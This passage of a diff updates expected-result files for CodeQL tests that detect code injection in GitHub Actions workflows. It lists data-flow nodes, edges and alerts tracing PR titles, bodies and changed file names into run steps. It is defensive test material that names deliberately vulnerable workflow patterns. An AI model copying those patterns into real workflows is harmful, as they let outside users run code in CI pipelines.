github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| 
.github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | 
env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| 
.github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo 
"::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index db8e7b485d76..262912c58a5e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -19,28 +19,28 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | | .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | -| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n 
ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | -| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | .github/workflows/test11.yml:20:13:20:44 | steps.set-ref.outputs.ref | provenance | | | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | -| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [ref] | provenance | | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | provenance | | -| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | provenance | | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | provenance | | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | provenance | | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | provenance | | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | provenance | | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | provenance | | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | provenance | | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | provenance | | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | provenance | | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | provenance | | -| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git 
diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo 
"TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | 
.github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | 
github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| 
.github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| 